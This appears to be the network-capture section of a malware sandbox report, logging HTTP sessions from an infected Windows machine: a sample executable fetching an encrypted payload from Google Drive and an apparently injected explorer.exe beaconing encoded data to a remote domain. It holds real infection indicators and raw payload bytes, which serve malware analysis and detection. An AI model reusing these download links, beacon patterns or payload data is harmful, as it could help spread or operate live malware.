                                                                                                                                                                          Data Ascii: 7nWHV=08rfDwUTHI6oaC2QDqdNFA4ed-sNqDfcGXj9~bq1KfURs7NLKnz_m-E_q7VGEgdckqdtyyONMyd7pIk-wkbmhrZncEzH8gihOoBRbd3t17H7C4UgLLeVU4omYIp6ECQ7SdJCSGYTs05fnDeazpBI0CqRVWopMyTZZugre5bMnYhBgCbK07aHGwRAJiwZknaxY6U_PO0RGx5Mox5iUNBz(ONtM92uaHZh682DkvUZuuVwnOL1uDftmiGNuMEL3tH21Ff2JEIFM3nv1bEFEW~Pnmbe3YTbhAmc3e7aSJSXKPlNrKvWHnbs14miYj8Xm2s6x_yix2KJULovRfw76_YXInhOYxqL1mtVwi0GEGJCaqlJVeKfYyv6fvQQ1Mj6USKAu6uZ(zQd3_W6LljGznoQ2N06RLhHJ8jpvgaioiKtsTCCm3bKA4V2AwknQaLa8Cknxao1abFGNedzFbdtu1cVMAJuODg3hJ7xAEIIkj9gubNfVd0FNeoNJ_X5xGyuUgPP2cmdhgs4W7nQYqeyA2mk3ZwNkyWyjrn3mVpwrCXKqIQn4yhK2hGsmaNJ(1SstTaATPc1RQRQ5vqDOEtU75a78bIZNeFI5vVIT2uz0pHrk_WAqNKrhyx19JGF3m(yMqtK9-zKuMiqC0EH9m(-R6q46k9OFRJE5sv7Pl5Jv80CASYkwyOd3DUenIf5pHY8nrz2CTY9Gqv6YgIla21F6rsBuig0uEVSGl6pLbeGQ5hHuhebZ2y9(Hh78espQQaL5Q3hyp5ppzgQWqe4az5NMoe3TM3Xzh6IHmktqjt6Sjxtk_sOhRzuvTxYMN1L3x7eBznDcr683C6y1eA_0Q71Iv170g72m-2l4uRZJV(4a7r-4AI-8UJkBWcigyWMp13ALnReNrfU5mj5W_v_e7g9Iawnj6fZzS2BG7aBPuSNW7xVIT9AWSKbI798Z0KghcikGHEs(oCRd63MAQjpINUvrboyFPTjFtmq8eUbiar5swXYjH27JzAlaJ8DuVzUraX3aMHye0YzedYbxFT4ImReIEHqmsdUnxtwxSjLd4UVKOojdXtVYUzM(w6ncpvtvw5WueDMzCLoL5973mhklgsJK5VGlQDxN848Izzjg14cZTSqyhMKAErxy7uzYi4oSV3OdcmmS_HybG24QMcHUcKh25nUTDs8eXLkpMnaDdlK2tg6osnx7NWE55DNk7E7SZWSUAPN7nCUyzyX(bQjKnheP60snbf219G3mOgpP0PIFaWFJW8y3D8tHNwi(P4tM8Q1bTByKQ894MDOT9j-tmRsp1zd7x5l20MLV-8eUDfDXH3O9lsL03L7fERBiEkl9zRPRPgIIhWzQJTQOy7stIiToC~xpwFLCLXKzloHGp~xzPX0j2ymVuRAQkMTMfxHcUnzbyvBjXCzEv8wwT7Kea2Jgq6s3JUfvQ6UELVwQq8Ts_FKbHyWWRf6lX4-zn6JaX(tlhJcc1fohKX1yTbsCSFXOfKDONeTGGgkYX2wZmrcwSBYRpNTTpmM0vSdMdOsHEjwAMdXNyA-bspppkjpMHwVtp9SmiKOkptdQJ1rPN~EUXKkp3bFKTwcja(k0nq9cKtTosmMIYVlGGfGZz45~ZAnS_~w(EfhuZrVXQ9_FdV8uSMOFDG0cCRaMpmCRMP6dzJ0kC~yYYb5JqH99pN4mHbwgQcHAJ0uGaGXqGYHWsjUUdUaCMCsCIM_1Sy9IDIqL6NRQdY1l7ZTUmdSBzJiF1a0jmyyfbLVHBNfOSXqE-Yd93J9dmRz2P9E2uoX0zGjOrplGZ79RQDUkhXwTaSeaaRL~UPT9pPwWpRJ4BM9ZKVQFOsfu94ux70bZZSWSk9UW0COxUh1XxnD(L2sNZLrPibwJKfKL9bFuq44e78eYpfMb8m-Eapf5Y55L_Ssz3jFEXZ4yR6ukWup8K6VA-LxCTKU3Nvc9lJ4kKdh~lARRM(vmukApBcUBycbpsYHnbLn3SWEyPlg7gB_g7HkX_QALCZYj1zE23pqLrGSxct4JoVmo8t-gQaqzMfLvXeNfDe977REoK6Z9rK8Qhx_rHBgYxuggExXI0eqWYFhxP66O4ijmu2FWMSiDQWgpRg2XNCx4-AvN6ENp4oKINMsWnws~s(Ur-D3bgogu122o3KH7kH-4KfyeajLiEeN9LenlvVS3SeeORaufo0i~43oEmPph3YLFYREO4F5MibPwZzC9UsbzG6jgnzUyBM1z8SStHu72qS-L5kFx8OSG8GWWPXNuxSaAJplm6p-0FNgoLesR3ny2fy0dfLCH5I5rY3pieuLRA6aILzX95ikLo0DjyTywyr1uZ(p0zbnBNf7DJqSdko8W1~6NIgu8BzZOTOMp1owwRfC4ecebIECdoJpiyk5a723tzLR4OtX9YV_qyrfFHdoe4T6kEDdoUizZQDI5oyBqTJK5VglBhJhOLRNEyvD5iftJkc3yLJfjtyXDe4LVTGcewxMdzExXRv9z5L1BkySxiRFKszgXW4SxnPcBolPGwAG8rO_h6eR~DyNfIWoffk9PUm7KIDegphZht4UGKyMocOLRVJdGpgLAOOhuFhgHERzWxtEhgKDB4FE9XsWFdnuLAoU(jz8KzsjLzSRbpyq7CIR11dIGF0Nsw9a1c8DPOLDLXdW2f7Uj7elB3sRdLEO9H21LkME5zHtmzMAg5upwS9-x0jj9EsoXpCftEoFip(6TRpK7bKdQuJRKvx50IrGZj35myEr6FMZFmFfJ7zkIPmowTGiFW8S6ylS8prJJj5LdGx5LamoXcHsOtG2tFwHFmX2AEyQ40s2j20COC~FyMzZFC7-WCH6aXaIkujDvgBgO-xr9jnWlYR_VI2uG7UqiLnaxzJmknqKpyTnmIX50-eceiYsn_5AWMnuB9fNR_cu0sLT0Qh6HNSI(W0VNoKDl-zqfXtyoy58RE~NdjLsEvpRMc7f33MNxCYFpL1jF7ZYTzH6i68PO3krMpOLAHIWPlX4g9IdPbUjqCd7vz88SN1IQjLJmmvLrR~CgcyC~R5zOf9Rm0Ul55jzUu2mNVx1(DFsVEfMlpfcRRBOt5K9mSNtck2DYtsjgvG_1uDP3zX2URuhMNWqY6x9PatgA_GO7qJhiL0XUdxIm5JzxlqbykY5FhkNaeLtwEgkB527NfkTwLRpsBgC~C0NjRA5Ksas7LqgKcte3Al_9jegKU1RWi6DLKD-I-YieQFiXufYWX(oXNjaFqvr4qvY9UNCvlnIEjRbzC7B~ZKjaxJpbiIfnRYOVbhbGvSkX-K1yQ6dYQyVV9(p8GmjCS7nRyEzt2RfRLhgy8d49DrEhDyXJ4t_N6NUs50alIk5jg(bUhsbUw58uLsHr8z_DT03(55EMNBarSfvLG33s2oKBU5zhK9oRRtngDRK90rlSM3aJikqDiZBa4LU~9uuRYmZBErQurWj8-ZwBBcpGt3oowdBkoVRUY1Hr-(6XC5tS7k7EGVRh6Vh6o8f8ZeKjVXFahIDPwJEtF7W3Q(4UpGF2i(DqyQLCOa3RhD_1kKbvEIOQ1p4O3U9ktAAmfaZQiURdBwDJbEjBEE5~I2J0rKjWSSEAKiq~KOpBQjUi9Ii67ZS~DPdNs9SmH9ivLMGxmjhVY6zIR2YopbWa05nK1sq0S7lA_1KW6iez9BufxtKYyGmIBkz~shVr0Kqx0bTVz6z81GRifsOv7GZtjRBfDaIhDMEQp8ro7XRHcaXlTfIE3kjFEE5tJO2qGDy70~bCjlCgj8jzkmBFE~LPcJ6Pe~t1ysKwO3SYIkYwGFoUmPzp862nfbyMeXOC907hutp5weoygAYCdZIDkuCybsJ~LDAvR66QDINOrni5idtACQkjOgPxdJVba59xiZygCKgiy7wjXXeX1Qumks-e0lftaX5nvvJ0Cx5oeW4TxnjJnJ0Gq6wdoDlIw5vrIk5FclwNb06sD5PLn9_sFcqQpkxccav8DZSpMjGupWxEexwouGbRIIGd5j2WwsxYsQo56oPtdHaanAQ4OVDH5tFj25kmcuJpwaPSuljuhcFD7XQ6Hr8KV9Zy3XmPvfmp_C9AjfmAKDiirJQK7J6IMaXEzkndhaP
                                                                                                                                                                          Dec 5, 2022 15:20:38.021472931 CET12991OUTData Raw: 7a 49 33 35 75 6c 6b 4f 71 51 6a 4e 33 7a 57 6a 42 34 6c 6a 34 68 72 38 30 32 7a 58 31 4c 63 65 70 4e 45 68 79 41 65 48 52 7a 73 66 6f 7a 45 6f 38 45 48 78 54 6e 6c 48 30 2d 69 79 6f 41 66 44 30 52 53 52 57 6b 6f 56 54 33 6a 4b 4f 47 65 4f 78 75
                                                                                                                                                                          Data Ascii: zI35ulkOqQjN3zWjB4lj4hr802zX1LcepNEhyAeHRzsfozEo8EHxTnlH0-iyoAfD0RSRWkoVT3jKOGeOxueFFJCFNKXWsnpove31~ZHKY0CFyOcclP(oKpJwxeJLQ4nkpV8O3m1LzVkOlLegFd1YhwswkAEiQS6LYt9cZ8CNp5uc33OJ3EV7xmGeOMK5vNTBl0XSGevMhCvJdL4WwPAg8o7H6qYa(HT6wyNzm8RkVrWJdFIqOBN


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          99192.168.11.2049958208.91.197.3980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:40.202542067 CET12991OUTGET /nqhc/?7nWHV=5+D/AEotBIiARx+RPOYdHDoSCIwvlBfWKmb14ofQdN1lqNdZOlbl7P8VoNd3a3Fenblb13q2VSw+uZcH+Wrp87x4A2/T8XiFdA==&jP1=y48xBzJ0mzz HTTP/1.1
                                                                                                                                                                          Host: www.pinwheeleffect.org
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:20:40.494645119 CET12992INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:20:40 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                          Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                          Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                          Set-Cookie: vsid=927vr4177956403546408; expires=Sat, 04-Dec-2027 14:20:40 GMT; Max-Age=157680000; path=/; domain=www.pinwheeleffect.org; HttpOnly
                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_IdsS2h7PJJdmFyo0aP/gBliZFUiNi8pbKkonGy3TeBjh/IoYs8h/Zo0iHZreXPyJV8TTdMUpGteDVDKmOLKZsg==
                                                                                                                                                                          Keep-Alive: timeout=5, max=123
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Raw: 36 36 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77
                                                                                                                                                                          Data Ascii: 669c<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAw
                                                                                                                                                                          Dec 5, 2022 15:20:40.494745970 CET12994INData Raw: 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43
                                                                                                                                                                          Data Ascii: SAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_IdsS2h7PJJdmFyo0aP/gBliZFUiNi8pbKkonGy3TeBjh/IoYs8h/Zo0iHZreXPyJV8TTdMUpGteDVDKmOLKZsg=="><head><script type="text/javascript">var abp;</scr
                                                                                                                                                                          Dec 5, 2022 15:20:40.494820118 CET12995INData Raw: 61 74 65 49 45 37 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61
                                                                                                                                                                          Data Ascii: ateIE7"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /><style type="text/css">*{margin:0; padding:0}a{text-decoration:none; outline:none}a:hover{text-indent:0; cursor:poin
                                                                                                                                                                          Dec 5, 2022 15:20:40.494901896 CET12996INData Raw: 63 36 36 34 64 20 3b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 7d 0d 0a 23 68 65 61 64 65 72 20 2e 68 65 61 64 54 6f 70 20 2e 6c 65 66 74 42 6c 6f 63 6b 7b 66 6c 6f
                                                                                                                                                                          Data Ascii: c664d ;float: left;margin: 0 0 10px;width: 100%;}#header .headTop .leftBlock{float: left}#header .headTop .rightBlock {float: right;}#header h1 a { font-size: 32px; font-weight: bold; color:#fff; }#header .head-pad a:hover{text-deco
                                                                                                                                                                          Dec 5, 2022 15:20:40.495027065 CET12997INData Raw: 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 7d 0d 0a 23 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 7d 0d 0a 2e
                                                                                                                                                                          Data Ascii: r:#ffffff;font-size:11px;text-decoration:underline;}#logo img{border:0 none;}.searchbox{width:351px; height:30px;}.srch-txt{float:left; width:242px; height:28px; font-size:16px; line-height:28px; background:url(http://i3.cdn-image.com/__
                                                                                                                                                                          Dec 5, 2022 15:20:40.495148897 CET12999INData Raw: 6c 2c 20 2e 6b 77 64 5f 62 6c 6f 61 63 6b 20 75 6c 20 6c 69 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 33 38 38 70 78 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 0d 0a 2e
                                                                                                                                                                          Data Ascii: l, .kwd_bloack ul li{float:left; text-align:center;width:388px;list-style:none}.kwd_bloack ul{padding-top:9px}.kwd_bloack ul li{line-height:30px}.kwd_bloack ul li a{float:left;width:388px;text-decoration:underline; font-size:19px; font-w
                                                                                                                                                                          Dec 5, 2022 15:20:40.495249033 CET13000INData Raw: 6f 6c 6f 72 3a 23 66 66 66 7d 0d 0a 2e 69 6e 71 75 69 72 65 20 61 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 20 63 6f 6c 6f 72 3a 23 66 66 66 7d 2a 2f 0d 0a 0d 0a 2e 73 61 6c 65
                                                                                                                                                                          Data Ascii: olor:#fff}.inquire a {font-size:12px; font-weight:normal; color:#fff}*/.sale-msg {background:#fff; color:#4b4b4b; text-align:center; font-size:14px; height:40px; width:100%; top:0; left:0}.sale-msg a {text-decoration: none; color:#079c
                                                                                                                                                                          Dec 5, 2022 15:20:40.495322943 CET13001INData Raw: 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 32 33 37 70 78 7d 0d 0a 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 7d 0d 0a 20 20 20 20 20 2e 68 65 61 64 65 72 2c 20 2e 62 6f 74 74 6f 6d 5f
                                                                                                                                                                          Data Ascii: p{background-size:100% 237px} .container{width:100%} .header, .bottom_rs ul{height:auto} .leftblk{float:none; padding:0 5px} .domain_name{line-height:33px; font-size:30px; float:left; width:74%; padding-top:29px; word-w
                                                                                                                                                                          Dec 5, 2022 15:20:40.495429993 CET13003INData Raw: 61 75 74 6f 3b 7d 0d 0a 0d 0a 23 68 65 61 64 65 72 20 68 31 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 7d 0d 0a 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74
                                                                                                                                                                          Data Ascii: auto;}#header h1 a{font-size: 28px;}}@media only screen and (max-width : 600px) {#header{text-align: center;}#header .headTop .rightBlock{float: none;}#header h1 a{font-size: 22px;}#header .leftBlock p a{display: inline-bl
                                                                                                                                                                          Dec 5, 2022 15:20:40.495521069 CET13004INData Raw: 6d 33 75 31 35 43 57 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 33 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 70 69 63 73 2f 38 39 33 34 2f 72 63 6f
                                                                                                                                                                          Data Ascii: m3u15CW" target="_blank"><img src="http://i3.cdn-image.com/__media__/pics/8934/rcomlogo.jpg" ></a> </div> </div> </div> <div class="headbottom"> <div class="container clearfix"> <div class="
                                                                                                                                                                          Dec 5, 2022 15:20:40.617141008 CET13005INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 64 69
                                                                                                                                                                          Data Ascii: </div> </div> --> <div class="content clearfix"> <div class="arrows frt_arr pngFix"></div> <div class="kwd_bloack clearfix"> <h4> <span


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          0192.168.11.2049821172.217.23.110443C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          2022-12-05 14:13:33 UTC0OUTGET /uc?export=download&id=1ci_fZY9vhWqDsoVL9EsZt-nC3_CtEg73 HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Host: drive.google.com
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2022-12-05 14:13:34 UTC0INHTTP/1.1 303 See Other
                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:13:34 GMT
                                                                                                                                                                          Location: https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/41p6p8b8de87nda3pnh8ht90u3kusm97/1670249550000/00631903678986001080/*/1ci_fZY9vhWqDsoVL9EsZt-nC3_CtEg73?e=download&uuid=85b46012-288f-4c0a-b12e-c636b72305d2
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                          Content-Security-Policy: script-src 'nonce-yfrzSZv1qHQKXXsVOiD4Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                          Server: ESF
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                          Connection: close


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          1192.168.11.2049823142.250.184.225443C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          2022-12-05 14:13:34 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/41p6p8b8de87nda3pnh8ht90u3kusm97/1670249550000/00631903678986001080/*/1ci_fZY9vhWqDsoVL9EsZt-nC3_CtEg73?e=download&uuid=85b46012-288f-4c0a-b12e-c636b72305d2 HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Host: doc-0g-7s-docs.googleusercontent.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2022-12-05 14:13:35 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                          X-GUploader-UploadID: ADPycdtZJ94tXuaonZ8DRVIgxiM-Y2ct_fof64HdXkArzbQqTSgBj85ZOr8aAp3LenvTvnxnndr4o-Rr2s-piPr8XkD6y9lv8uRN
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Content-Disposition: attachment; filename="lyEbZohNV201.jpb"; filename*=UTF-8''lyEbZohNV201.jpb
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context
                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                          Content-Length: 189504
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:13:34 GMT
                                                                                                                                                                          Expires: Mon, 05 Dec 2022 14:13:34 GMT
                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                          X-Goog-Hash: crc32c=A+nEOA==
                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2022-12-05 14:13:35 UTC6INData Raw: e0 79 c5 06 d1 41 5a 81 54 12 d9 cc a5 76 3e 2d 57 57 c1 fe a2 9e 44 06 60 1f d8 f2 44 fe 29 b5 66 ac 13 c3 01 38 2c f4 c5 cb 68 47 de 95 d1 f1 4b 7b 87 a0 15 aa c6 ef ca 99 0f b4 09 53 e7 51 ab 74 33 77 12 1a ef 9a dd 99 2e 22 19 43 8c 3a b5 73 bd 5f f2 59 e7 f0 e7 06 11 f1 18 5b a9 a8 79 c4 b8 18 42 b8 ab eb 93 8b 3d 93 f2 88 0e a9 21 21 c7 62 42 21 c7 38 27 c4 e2 39 21 81 e5 b7 bf bf f9 a1 c9 db b7 9c df 7b 7e 6f f5 34 0a 83 95 fe 7d c5 50 f0 e7 2d 37 a7 b3 ab 0b 35 2f 11 68 db dd ce 0d f9 4f d8 69 5d 46 e3 87 7b e7 ba 66 7d 18 67 b8 0e ce 50 26 80 5f 77 51 0d 3d 1f ae 95 7e a1 d6 96 42 9d 44 02 aa a6 38 49 e4 5e 74 e8 0e f6 77 a0 bf 56 cd d3 42 a3 9e 91 43 49 8e ca 1d 5c 97 80 4b 4f 4e 6a 4b 89 90 9f ba c3 8a 78 41 e6 e9 9f 74 28 c1 be d9 4c a0 ab db
